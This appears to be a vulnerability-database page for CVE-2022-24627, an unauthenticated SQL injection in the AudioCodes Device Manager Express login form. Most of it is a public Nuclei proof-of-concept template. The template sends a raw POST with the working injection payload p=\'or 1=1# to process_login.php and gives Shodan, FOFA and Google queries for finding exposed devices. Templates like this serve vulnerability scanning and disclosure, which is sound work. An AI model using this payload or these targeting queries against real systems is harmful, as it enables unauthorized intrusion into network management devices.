漏洞描述
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
CVE-2022-24627: AudioCodes Device Manager Express - SQL Injection
PoC代码[已公开]
id: CVE-2022-24627
info:
name: AudioCodes Device Manager Express - SQL Injection
author: geeknik
severity: critical
description: |
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
reference:
- https://seclists.org/fulldisclosure/2023/Feb/12
- https://nvd.nist.gov/vuln/detail/CVE-2022-24627
- https://github.com/tr3ss/newclei
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24627
cwe-id: CWE-89
epss-score: 0.51085
epss-percentile: 0.97796
cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: audiocodes
product: device_manager_express
shodan-query:
- title:"Audiocodes"
- http.title:"audiocodes"
fofa-query: title="audiocodes"
google-query: intitle:"audiocodes"
tags: cve,cve2022,seclists,sqli,audiocodes
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "audiocodes</title>")'
internal: true
- raw:
- |
POST /admin/AudioCodes_files/process_login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=&domain=&p=%5C%27or+1%3D1%23
matchers:
- type: word
part: body
words:
- "SQL syntax"
- "mysql_fetch"
- "You have an error in your SQL syntax"
condition: or
# digest: 4a0a004730450220534f67ea26dbf8d387376f5e66c053d639efb001fc0bbf6c22c464212fa5dfcb022100d087035f10b255e8b051f4b75cec1e3235f21bd8382f200ecbe1edaae36be4b7:922c64590222798bb761d5b6d8e72950